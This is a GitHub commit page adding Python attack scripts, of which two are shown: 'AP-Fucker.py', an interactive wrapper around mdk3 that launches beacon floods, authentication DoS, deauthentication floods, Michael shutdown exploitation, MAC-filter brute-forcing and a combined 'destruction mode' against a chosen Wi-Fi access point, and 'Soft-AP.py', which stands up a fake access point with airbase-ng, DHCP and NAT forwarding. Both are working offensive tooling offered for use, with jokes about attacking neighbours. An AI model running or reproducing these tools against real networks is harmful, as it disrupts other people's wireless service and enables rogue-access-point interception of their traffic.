Permalink
Browse files

first code commit with a few scripts

  • Loading branch information...
1 parent b586ca4 commit 6062bbe86b73cf60354ccfadefb1ffaed110c17e @mattoufoutu committed Sep 17, 2010
Showing with 735 additions and 0 deletions.
  1. +270 −0 AP-Fucker.py
  2. +116 −0 Soft-AP.py
  3. +79 −0 ftp_user.py
  4. +270 −0 getproxy.py
View
@@ -0,0 +1,270 @@
+#!/usr/bin/env python
+# -*- coding: Utf-8 -*-
+#
+# WIRELESS ACCESS POINT FUCKER
+# Interactive, Multifunction, Destruction Mode Included
+#
+# Thanks to BackTrack crew, especially ShamanVirtuel and ASPJ
+#
+# USAGE: Launch the script as root using "python AP-Fucker.py", follow instructions, enjoy!
+# Prerequisites: Have mdk3 installed
+#
+
+__app__ = "AP-Fucker"
+__version__ = "0.5"
+__author__ = "MatToufoutu"
+
+### IMPORTS
+from sys import stdout
+from sys import exit as sysexit
+from os import system, remove, path
+from commands import getoutput
+from threading import Thread
+from time import sleep, ctime
+
+### MDK3 THREADED ATTACKS CLASS
+class Mdk3(Thread):
+ def __init__(self, attack, attack_options):
+ Thread.__init__(self)
+ self.attack = attack
+ self.iface = attack_options[0]
+ self.essid = attack_options[1]
+ self.bssid = attack_options[2]
+ self.chan = attack_options[3]
+ self.log = "apfucker.log"
+ self.modes = {"B":self.bflood, "A":self.ados, "D":self.amok,
+ "M":self.mich, "W":self.wids, "C":self.brutmac}
+ def bflood(self):
+ out = open(self.log,"a")
+ out.write("\n ----- "+ctime()+" : Launching beacon flood against %s on channel %s -----" % (self.essid, self.chan))
+ out.close()
+ print("\n Launching beacon flood against %s on channel %s" % (self.essid, self.chan))
+ sleep(2)
+ system("mdk3 "+self.iface+" b -n "+self.essid+" -g -w -m -c "+self.chan+" >> "+self.log)
+ def ados(self):
+ out = open(self.log,"a")
+ out.write("\n ----- "+ctime()+" : Launching Auth DoS against %s -----" % (self.bssid))
+ out.close()
+ print("\n Launching Auth DoS against %s " % (self.bssid))
+ sleep(2)
+ system("mdk3 "+self.iface+" a -i "+self.bssid+" -m -s 1024 >> "+self.log)
+ def amok(self):
+ out = open(self.log,"a")
+ out.write("\n ----- "+ctime()+" : Launching Deauth Flood 'Amok' Mode on channel %s -----" % (self.chan))
+ out.close()
+ print("\n Launching Deauth Flood 'Amok' Mode on channel %s" % (self.chan))
+ sleep(2)
+ system("mdk3 "+self.iface+" d -c "+self.chan+" -s 1024 >> "+self.log)
+ def mich(self):
+ out = open(self.log,"a")
+ out.write("\n ----- "+ctime()+" : Launching Michael 'Shutdown' Exploitation against %s on channel %s -----" % (self.bssid, self.chan))
+ out.close()
+ print("\n Launching Michael 'Shutdown' Exploitation against %s on channel %s" % (self.bssid, self.chan))
+ sleep(2)
+ system("mdk3 "+self.iface+" m -t "+self.bssid+" -j -w 1 -n 1024 -s 1024 >> "+self.log)
+ def wids(self):
+ out = open(self.log,"a")
+ out.write("\n ----- "+ctime()+" : Launching WIDS Confusion against %s on channel %s -----" % (self.essid, self.chan))
+ out.close()
+ print("\n Launching WIDS Confusion against %s on channel %s" % (self.essid, self.chan))
+ sleep(2)
+ system("mdk3 "+self.iface+" w -e "+self.essid+" -c "+self.chan+" >> "+self.log)
+ def brutmac(self):
+ global runanim
+ runanim = True
+ out = open(self.log, "a")
+ out.write("\n ----- "+ctime()+" : Launching MAC filter Brute-Forcer against %s -----\n" % (self.bssid))
+ print("\n Launching MAC filter Brute-Forcer against %s" % (self.bssid))
+ sleep(2)
+ macfound = getoutput("mdk3 "+self.iface+" f -t "+self.bssid).splitlines()[-2:]
+ runanim = False
+ sleep(1)
+ print; print
+ for line in macfound:
+ print(line)
+ out.write("\n"+line)
+ out.close()
+ print
+ sysexit(0)
+ def run(self):
+ global runanim
+ runanim = True
+ self.modes[self.attack]()
+ runanim = False
+
+### AUXILIARY FUNCTIONS
+## CHECK IF IFACE IS IN MONITOR MODE
+def check_mon(iface):
+ for line in getoutput("iwconfig "+iface).splitlines():
+ if "Mode:Monitor" in line:
+ return True
+ return False
+
+## CHECK IF BSSID IS VALID
+def check_mac(ap):
+ if len(ap) != 17 or ap.count(':') != 5:
+ return False
+ macchar = "0123456789abcdef:"
+ for c in ap.lower():
+ if macchar.find(c) == -1:
+ return False
+ return True
+
+## CHECK IF CHANNEL IS VALID
+def check_chan(iface, chan):
+ if chan.isdigit():
+ channel = int(chan)
+ if not channel in range(1, int(getoutput("iwlist "+iface+" channel | grep channels | awk '{print $2}'"))+1):
+ return False
+ else:
+ return False
+ return True
+
+## CLEAN EXIT
+def clean_exit():
+ print;print
+ print("\nAction aborted by user. Exiting now")
+ for pid in getoutput("ps aux | grep mdk3 | grep -v grep | awk '{print $2}'").splitlines():
+ system("kill -9 "+pid)
+ print("Hope you enjoyed it ;-)")
+ sleep(2)
+ system("clear")
+ sysexit(0)
+
+## DUMMY WAITING MESSAGE (ANIMATED)
+def waiter(mess):
+ try:
+ stdout.write("\r | "+mess)
+ stdout.flush()
+ sleep(0.15)
+ stdout.write("\r / "+mess)
+ stdout.flush()
+ sleep(0.15)
+ stdout.write("\r-- "+mess)
+ stdout.flush()
+ sleep(0.15)
+ stdout.write("\r \\ "+mess)
+ stdout.flush()
+ sleep(0.15)
+ stdout.write("\r | "+mess)
+ stdout.flush()
+ sleep(0.15)
+ stdout.write("\r / "+mess)
+ stdout.flush()
+ sleep(0.15)
+ stdout.write("\r-- "+mess)
+ stdout.flush()
+ sleep(0.15)
+ stdout.write("\r \\ "+mess)
+ stdout.flush()
+ sleep(0.15)
+ except KeyboardInterrupt:
+ clean_exit()
+
+### MAIN APP
+try:
+ import psyco
+ psyco.full()
+except ImportError:
+ pass
+
+attackAvail = ["B", "A", "W", "D", "M", "T", "E", "C"]
+attack_opt = []
+
+if getoutput("whoami") != "root":
+ print("This script must be run as root !")
+ sysexit(0)
+try:
+ system("clear")
+ print("\n\t\t########## ACCESS POINT FUCKER ##########\n")
+ print("""Choose your Mode:
+ \t - (B)eacon flood
+ \t - (A)uth DoS
+ \t - (W)ids confusion
+ \t - (D)isassociation 'AmoK Mode'
+ \t - (M)ichael shutdown exploitation
+ \t - MA(C) Filter Brute-Forcer
+ \t - Des(T)ruction mode (USE WITH CAUTION)\n""")
+
+ ## GET MODE
+ while 1:
+ mode = raw_input("\n>>> ")
+ if mode.upper() not in attackAvail:
+ print(" '%s' is not a valid mode !" % mode)
+ else:
+ break
+
+ ## GET INTERFACE
+ while 1:
+ iface = raw_input("\nMonitor interface to use: ")
+ if check_mon(iface):
+ attack_opt.append(iface)
+ break
+ else:
+ print("%s is not a Monitor interface, try again or hit Ctrl+C to quit" % iface)
+
+ ## GET ESSID
+ if mode.upper() == "B" or mode.upper() == "W" or mode.upper() == "T":
+ attack_opt.append("\""+raw_input("\nTarget ESSID: ")+"\"")
+ else:
+ attack_opt.append(None)
+
+ ## GET BSSID
+ if mode.upper() == "A" or mode.upper() == "M" or mode.upper() == "T" or mode.upper() == "C":
+ while 1:
+ bssid = raw_input("\nTarget BSSID: ")
+ if check_mac(bssid):
+ attack_opt.append(bssid)
+ break
+ else:
+ print("Invalid BSSID, try again or hit Ctrl+C to quit")
+ else:
+ attack_opt.append(None)
+
+ ## GET CHANNEL
+ if mode.upper() != "C":
+ while 1:
+ channel = raw_input("\nTarget channel: ")
+ if check_chan(iface, channel):
+ attack_opt.append(channel)
+ break
+ else:
+ print("Channel can only be 1 to 14, try again or hit Ctrl+C to quit")
+ else:
+ attack_opt.append(None)
+
+ ## LAUNCH SELECTED ATTACK
+ if path.exists("apfucker.log"):
+ remove("apfucker.log")
+ if mode.upper() != "T":
+ system('clear')
+ Mdk3(mode.upper(), attack_opt).start()
+ sleep(1)
+ print; print; print
+ while runanim:
+ waiter(" ATTACK IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
+ else:
+ system('clear')
+ print("\n\t/!\\/!\\/!\\ WARNING /!\\/!\\/!\\\n")
+ print(" You've choosen DESTRUCTION MODE")
+ print(" Using this mode may harm your WiFi card, use it at your own risks.")
+ validate = raw_input(" Do you wish to continue? (y/N): ")
+ if validate.upper() != "Y":
+ print(" Ok, exiting now")
+ sysexit(0)
+ else:
+ out = open("apfucker.log","a")
+ out.write("\n ----- "+ctime()+" : Launching Destruction Combo. Target is AP %s|%s on channel %s -----" % (attack_opt[1], attack_opt[2], attack_opt[3]))
+ out.close()
+ print("\n Launching Destruction Combo\n Target is AP %s|%s on channel %s" % (attack_opt[1], attack_opt[2], attack_opt[3]))
+ print(" Please be kind with your neighbours xD")
+ ##wids not implemented: may raise segfault
+ ##appears to be an internal mdk3 issue when running multiple attacks
+ for atk in ("B", "A", "D", "M"):
+ Mdk3(atk, attack_opt).start()
+ sleep(1)
+ print; print; print
+ while runanim:
+ waiter(" DESTRUCTION COMBO IS RUNNING !!! HIT CTRL+C TWICE TO STOP THE TASK...")
+except KeyboardInterrupt:
+ clean_exit()
View
@@ -0,0 +1,116 @@
+#!/usr/bin/env python
+# -*- coding: Utf-8 -*-
+
+__app__ = 'SoftAP Maker'
+__verions__ = '0.3'
+__author__ = 'MatToufoutu'
+
+import os
+from sys import exit as sysexit
+from commands import getoutput
+from threading import Thread
+from time import sleep
+
+def airBase(bssid, essid, channel, iface):
+ os.system("modprobe tun 2>&1 1>& /dev/null")
+ os.system("xterm -e airbase-ng -a %s -e '%s' -c %s %s" % (bssid, essid, channel, iface))
+
+#CHECK IF USER IS ROOT
+if getoutput('whoami') != 'root':
+ print("You have to be root!")
+ sysexit()
+
+os.system("clear")
+print("\n\t\t\t[ SoftAP Maker ]")
+
+# GET SETTINGS FOR THE FAKE AP
+IFACE, BSSID, ESSID, CHANNEL = '', '', '', 0
+DHCPDCONF="""
+## This configuration was auto-generated for SoftAP
+ddns-update-style ad-hoc;
+default-lease-time 600;
+max-lease-time 7200;
+subnet 10.0.0.0 netmask 255.255.255.0 {
+ option subnet-mask 255.255.255.0;
+ option broadcast-address 10.0.0.255;
+ option routers 10.0.0.1;
+ option domain-name-servers 208.67.222.222, 208.67.220.220;
+ range 10.0.0.10 10.0.0.20;
+}
+## End of SoftAP auto-generated config
+"""
+
+IFACE = raw_input("\nWireless interface to use\n>>> ")
+while IFACE not in getoutput('iwconfig'):
+ print("Interface %s can't be found, please try again\n" % IFACE)
+ IFACE = raw_input("Wireless interface to use\n>>> ")
+if not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[0] \
+and not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[1]:
+ print("Switching interface to Monitor Mode")
+ os.system('airmon-ng start '+IFACE+' > /dev/null')
+ if not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[0] \
+ and not 'Monitor' in getoutput('iwconfig '+IFACE).splitlines()[1]:
+ print("Could not switch interface to monitor mode")
+ print("If your interface use VAPs, specify directly your monitor interface")
+ sysexit()
+
+OUT_IFACE = raw_input("\nInternet connection interface\n>>> ")
+while OUT_IFACE not in getoutput('ifconfig'):
+ print("Interface %s can't be found, please try again\n>>> " % OUT_IFACE)
+ OUT_IFACE = raw_input("Internet connection interface\n>>> ")
+
+BSSID = raw_input("\nFake AP's BSSID (leave blank to use card's @mac)\n>>> ")
+while (len(BSSID) != 17) and (BSSID.count(':') != 5):
+ if BSSID == '':
+ BSSID = getoutput('macchanger -s '+IFACE+" | awk '{print $3}'")
+ break
+ print("BSSID %s in not valid. Please try again" % BSSID)
+ BSSID = raw_input("Fake AP's BSSID (leave blank to use card's @mac)\n>>> ")
+
+ESSID = raw_input("\nFake AP's ESSID\n>>> ")
+while ESSID == '':
+ print("You MUST enter an ESSID for your Fake AP")
+ ESSID = raw_input("Fake AP's ESSID\n>>> ")
+
+CHANNEL = raw_input("\nChannel to use\n>>> ")
+while not CHANNEL.isdigit() and not (0 < int(CHANNEL) < 14):
+ print("Channel %s is not valid. It must be 1 to 13. Please try again")
+ CHANNEL = raw_input("Channel to use\n>>> ")
+
+#SETUP FAKE AP
+print("\n\nStarting airbase-ng in a separate window")
+fakeAP = Thread(None, airBase, None, (BSSID, ESSID, CHANNEL, IFACE), {})
+fakeAP.start()
+sleep(3)
+os.system('ifconfig at0 up && \
+ ifconfig at0 10.0.0.1 netmask 255.255.255.0 && \
+ ifconfig at0 mtu 1500 && \
+ route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1')
+configfile = open('dhcpd.conf', 'w')
+configfile.write(DHCPDCONF)
+configfile.close()
+print("\nStarting DHCP server for SoftAP clients")
+os.system('dhcpd -cf dhcpd.conf at0 || dhcpd3 -cf dhcpd.conf at0')
+print("\nSetting up iptables and ip forwarding")
+if os.path.exists(os.getcwd()+'/iptables.rules'):
+ os.remove(os.getcwd()+'/iptables.rules')
+os.system('iptables-save > iptables.rules && \
+ iptables -F && iptables -X && iptables -Z && \
+ iptables -t nat -F && iptables -t nat -X && iptables -t nat -Z && \
+ echo 1 > /proc/sys/net/ipv4/ip_forward && \
+ iptables -t nat --append POSTROUTING --out-interface %s -j MASQUERADE'
+ % OUT_IFACE)
+endAP = raw_input("\nPress <Enter> to stop the SoftAP")
+
+#STOP AP AND RESTORE CONFIGURATIONS
+print("Restoring all configurations")
+dhcp_pid = getoutput("ps aux | grep -v grep | grep 'dhcpd -cf dhcpd.conf' | awk '{print $2}'")
+airbase_pid = getoutput("ps aux | grep -v grep | grep airbase-ng | awk '{print $2}'")
+os.system('kill -9 %s && killall airbase-ng && \
+ iptables -t nat -F && iptables -t nat -X && iptables -t nat -Z && \
+ iptables-restore < iptables.rules && \
+ echo 0 > /proc/sys/net/ipv4/ip_forward' % dhcp_pid)
+os.remove(os.getcwd()+'/dhcpd.conf')
+os.remove(os.getcwd()+'/iptables.rules')
+print("\nThanks for using SoftAP Maker\n")
+sysexit()
Oops, something went wrong.

0 comments on commit 6062bbe

Please sign in to comment.